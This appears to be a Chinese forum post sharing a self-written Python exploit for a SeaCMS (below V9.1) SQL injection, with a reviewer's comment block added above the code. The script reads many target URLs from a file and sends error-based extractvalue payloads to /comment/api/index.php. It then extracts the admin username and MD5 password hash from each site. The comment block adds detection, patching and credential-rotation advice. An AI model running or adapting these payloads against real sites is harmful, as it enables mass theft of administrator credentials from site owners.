自己写的Seacms漏洞利用脚本
SeaCMS V9.1以下版本SQL注入漏洞
获取管理员表中第一个用户的账号及其密码的md5值
需要在脚本的同级目录新建一个dir.txt里面存放网址
# NOTE(review): this listing was collapsed onto a single physical line. Because
# that line starts with '#', Python reads all of it as one comment; the nesting
# of the for/try/if/else statements is not recoverable from this line alone and
# has to be taken from the original post.
#
# What the statements do, read in order:
#   * read one base URL per line from dir.txt;
#   * send two GET requests per base URL to /comment/api/index.php, each with a
#     crafted rlist[] query parameter;
#   * the parameter embeds an extractvalue() call around a sub-select on the
#     sea_admin table (password in the first request, name in the second);
#   * the regex captures the value from the "XPATH syntax error: '...'" text
#     in the HTTP response body.
# This is error-based SQL injection. It only yields data when the application
# returns the database error message to the client.
#
# Defender notes:
#   * Detection: look in web-server / WAF logs for requests to
#     /comment/api/index.php whose rlist[] value contains extractvalue,
#     concat_ws, sea_admin or backtick/%27 sequences, and for response bodies
#     containing "XPATH syntax error".
#   * Mitigation: move to a SeaCMS release that is not in the affected range
#     named in the page header; stop echoing database errors in responses;
#     validate rlist[] entries server-side.
#     (presumably they are numeric comment ids, so an integer cast would be
#     enough - confirm against the SeaCMS source).
#   * Response: if such requests appear in logs, treat the admin name and
#     password hash as disclosed and rotate the credential. The page states the
#     stored value is an MD5 hash, which offers little resistance to offline
#     guessing.
#SeaCMS #Author:Root import requests import time import re dir = open('dir.txt','r') for i in dir: try: print(time.strftime('%Y-%m-%d %H:%M:%S')) url = i.strip('\n')+"/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`" url2 = i.strip('\n')+"/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`" s = requests.session() a = s.get(url,timeout=10) b = s.get(url2,timeout=10) view = a.text view2 = b.text pw = "".join(re.findall("XPATH syntax error: '\\\\ (.*?)\' <",view)) name = "".join(re.findall("XPATH syntax error: '\\\\ (.*?)\' <",view2)) if(pw and name): print("[*]Success! "+i.strip('\n')) print("[*]AdminName: "+name) print("[*]AdminPass: "+pw+'\n') else: print("[*]We found nothing in "+i) except: print("[*]Cannot connect "+i)